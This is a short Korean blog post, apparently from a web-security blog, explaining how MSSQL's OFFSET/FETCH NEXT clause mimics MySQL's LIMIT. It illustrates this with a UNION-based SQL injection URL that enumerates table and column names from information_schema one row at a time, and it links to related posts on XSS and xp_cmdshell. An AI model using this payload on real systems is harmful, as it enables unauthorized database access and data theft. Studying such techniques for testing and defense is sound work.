MSSQL에서 MYSQL의 limit와 같은 기능을 사용하려면 다음과 같은 구문을 사용하면 됩니다.
OFFSET (시작하고자 하는 index) ROWS FETCH NEXT (출력하고자 하는 갯수) ROWS ONLY
OFFSET ? ROWS FETCH NEXT ? ROWS ONLY 구문을 사용하기 위해서는 order by 구문과 같이 사용해야 합니다.
http://test.com?mode=list&year1=2018&mon1=09&day1=18&year2=2018&mon2=09&day2=20' and 1=2 union select 1,2,table_name,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=(select table_name from information_schema.tables order by table_name OFFSET 3 ROWS FETCH NEXT 1 ROWS ONLY)--
다음과 같이 order by절 뒤에 OFFSET구문이 들어갑니다.
'Web' 카테고리의 다른 글
| marquee onstart xss & XSS 기법 (0) | 2019.05.10 |
|---|---|
| 주요 Editor 샘플페이지 및 취약점 발생경로 (4) | 2018.12.03 |
| xp_cmdshell 활성화 쿼리 (1) | 2018.10.01 |
| MSSQL Injection (0) | 2018.09.20 |
| Oracle Error based injection (0) | 2018.08.23 |